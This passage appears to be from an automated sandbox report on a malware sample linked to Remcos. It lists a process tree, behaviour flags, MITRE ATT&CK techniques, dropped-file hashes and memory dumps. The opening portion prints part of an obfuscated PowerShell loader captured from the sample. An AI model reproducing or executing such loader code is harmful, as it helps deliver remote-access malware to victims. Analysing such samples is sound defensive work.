erpdHistosEmbalvTaxake Mo kj Aposs stilnSammei KultnRecocgWaukeeGoupirPullinRetsgeSt ns. SelvDNathaoSammewBu genHenkalVerm oRe sva Tilld addlFQuer,i MildlKatedeLerpi(Excee$SkattA Bo fk mptouHudstterrattStamaeShall,Prehe$ epolSEnergcWidgeiS,rlyl iplolThr mamicroiAfstinOempo) liff ';$Scillain=$Drowsed[0];Dagpaafuglejernes (Forordnings 'M.ske$,opulgajangLHjrepo,frerBanimuAA.aviLPa,ru:redegs Fretp No dYPunkyt Chuht AbsteEfternSvineDh.intEBase =Forr (LgnerTStt semolehsDragstFilib-Or hoPAcroaAAteleTsternHbryg Shikr$Tima.sDick c,ubtuIMi jkl S rilFarina espoi s.ienSamme)Pa in ');while (!$Spyttende) {Dagpaafuglejernes (Forordnings 'defin$ BallgSkuddlarenao BegybKamacaingellinter:odontSVakuuuPolymbMyrrasSladrcBarmhrUnknoi S.olbBesvieSubvi= verf$ EksptAelurrSk lnuSteree Fe l ') ;Dagpaafuglejernes $Lenvoi;Dagpaafuglejernes (Forordnings 'LyksaSpuddet.agrea StrerDa matRetur- SkppSTertil MetaeSokkeeBegynp,onni Rapt4clist ');Dagpaafuglejernes (Forordnings 'Nutri$Mct.igOmniflHock oGentobForsmaNaboflSamme:RomdiS Srgepsli,eyTveknt Be.ktImpreeOverpnStegedSept eStukk=Pant (StrmnTBassieSljfesBritctBundg-DentnPSole.aSalu,tTermihAbsqu Fortr$BrnepSTran.cTilvniKruselSympal xsanaUngabiSammenLspek)Lejev ') ;Dagpaafuglejernes (Forordnings 'Adels$PelergadenolSaroto PulsbDist a N tilGespe:Hete SOmdeftAphidaMyn,isFnugfo Aldep kefoh Disco Spatb rovii EpinaUdrke=Lgede$Interg Brutl O,gaoEff kbInfriaBu anlselv :RokkeP arnihfremtibuddilHol.deSlyngaDekres Bore+Feder+Nonin%Flitc$Ka alUTpishdInterkUniveaBr.ecsDispatCroonnGiganiAlbumnOversgMelleeCannorTub.rnFrerbekristsSab.a.C ttycFad ro Kyaru overnHemict Tast ') ;$Akutte=$Udkastningernes[$Stasophobia];}$Margravatemmatrikulerede=343556;$Semihyperbolic171=29709;Dagpaafuglejernes (Forordnings ' uxan$ HovegTosenlP,ncroTisseb ProsaHeterlTrbaa:SurinFIndbarUnst eDkskomStyrmk Undea KredlMode.dMonoreAdg nrMise sCrede subju= C.ll GrassGLe toeA,bejtdigtn-FanebCRykkeoTllevnSemiatConveeHelixnDr prtSkewh Blan $ EuloSMythicForkoiTilfjl SpanlUnfacaPurreibredsnK mpl ');Dagpaafuglejernes (Forordnings 'Sla b$ScaleganstolSpor.oDevilbPseuda umpiltilgr:uranoEFlsk,lAnteseKnojev Aquis indfkBegotoHaecclRabaneFrgerrOdontn fornePr acsPleje Unf.d=Snd r Udvid[SamarS marlyfleecs rteltM dleeTandpmSlut . KaraCForfoo St rn Untov SargeSilker Overt Beth]Strat: ,ort:dis eFDosmerOverhoSprinmA tirB Fa laMrkblsAfkale Stor6udomo4Verm SF.lchtMon crBalisiBlac.n onolgslge.(Trlas$SamhpFBolchrCyc aeBlafrmP estkBiomialad llAnvendIn.ereSwizzrStatuspostv) Firl ');Dagpaafuglejernes (Forordnings 'Garde$hundeg Fil lBronkoDem nb Th oaOzonrl Alky:SkattOModehute ratNonsur F emaKinemu.rowdgMetalhtaxont Non. Vener= tedb rth[ PeriSBrystyT,nehsPuncttInddreTwptymCloth.StangTSupraeGanapxA bejtL,gga. ulorEHjemmnStea csnowsoBltesdData iHje,tnData g Dybd]Vigte:Brugs:A hioAM sfoSSnoolCIslicIKoordIV ndr. dfylG eproeHngedtStjerSPeachtSan,krUnporiUng rn.antogSalca( Trov$OutraECisellTvangeFlorov R pssEnebrkOpsk oSky.nlJuliae ErklrUdspynTrappeCul ysTownm) Slem ');Dagpaafuglejernes (Forordnings 'Regl $Sk esgTorrelBoagao T,nabEner aQuadrl Vent:DisalF OmstoBrugerStudeb rkosrJ.wesyUdlugdR nkseF rtir Lbl aGrundlUomtvbB nehuUdformtelevsTendr=dbers$OrifaO Akkvu VinktA skarSikk aHarmouottergStrithToogtt Humo.Hnge,s Rhacu Hamsb,aligsCren tWafturMassriOli dn efeg Zone(Devia$KunstMupsuraSamplrHy.ergSphaerJe,nva Anl vknoutaFunictKastre ggermPlanomMeconaSt.klt Butir SuediActinkAdhe uNomenlRes ae AnatrStemneAli odpandaeFste ,Besmr$ algS Junie vulom ammeiEthanhPolaryTelefp R gseGowkerFloteb otlioTrus,lSynkriU,eupc Drys1 unde7Energ1Ar al) aart ');Dagpaafuglejernes $Forbryderalbums;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:772
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magters.Fem && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2992
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
3b7bc8c3830fdae4fc6466a6a38f0acb

SHA1
8e3b137aea9f5e78d32edf7470a4ba0853fab854

SHA256
caa77e290b4b733e1680fcfd1de4b99053ab8e96f4d2889c4b74c0ec1f4c0cf8

SHA512
4dcaacadb452833f553a8dc5d4831210fc385b2e04726bd87ee02c8d4bf9b35ae6009fdf2809987430a19906383b8652bf6abfcc64abc7f30f0a4b6b4b2aa8b7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5f85fa0ae806bd87fe66dfce47ec1000

SHA1
4ee96bc4e28c35a84eedfe8b522c65b663e0d16b

SHA256
a66f3a7ec56fcdba8bf35f8f88c37f5eac1fe4c16b94e304c8c4c68dd2555519

SHA512
99185f231c1937cbae513836e5c65fc00149b71624a9dafa75f5511323f02ac9c134e429bfb841b3cf4613d4243136da27fbf8cf32f3e97511ffd13ef8aff389

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5534.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarDEAD.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Magters.Fem

Filesize
486KB

MD5
3afbc715696cc77a4d49af43a3c15662

SHA1
64c7405681a16ea54419698ff15b6466be0f8714

SHA256
a2758b404164db9953d8b9c516c33323ef1656d5d59917a0d9357f37b57387d0

SHA512
fc868f819dad316e41b0fe5865cc534b047917e6b785c63dac7d6a78760b22dd5840a4e2574220a41e0685dec5dc62a40f3dee8a3a54da7cfccab53b0402ebf4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T08EWHFOG1GITB45DLKO.temp

Filesize
7KB

MD5
0d96a19b12531c16531e7d66e4d5191e

SHA1
1f69384a60dcb66043fc337f237a41d97722764e

SHA256
a9b1bfdd7dfb5984cdb38f59dd82794d263151d8f9afb6deb72e8238f032fd69

SHA512
e127eafbfef07bcc9e46f1605285000592733c498746c9268f4ce2df466768e1b11b8e93c7b885c9f5d48393db1d0b1a378d34ce7c7772abdf1d151ccfbe9172

Download Submit
memory/772-35-0x00000000066A0000-0x0000000008766000-memory.dmp

Filesize
32.8MB

Download
memory/2384-61-0x0000000002020000-0x00000000040E6000-memory.dmp

Filesize
32.8MB

Download
memory/2384-38-0x0000000000FB0000-0x0000000002012000-memory.dmp

Filesize
16.4MB

Download
memory/2384-36-0x0000000002020000-0x00000000040E6000-memory.dmp

Filesize
32.8MB

Download
memory/2756-24-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-30-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-29-0x000007FEF58DE000-0x000007FEF58DF000-memory.dmp

Filesize
4KB

Download
memory/2756-27-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-25-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-26-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-22-0x0000000002720000-0x0000000002728000-memory.dmp

Filesize
32KB

Download
memory/2756-23-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-21-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/2756-62-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-20-0x000007FEF58DE000-0x000007FEF58DF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing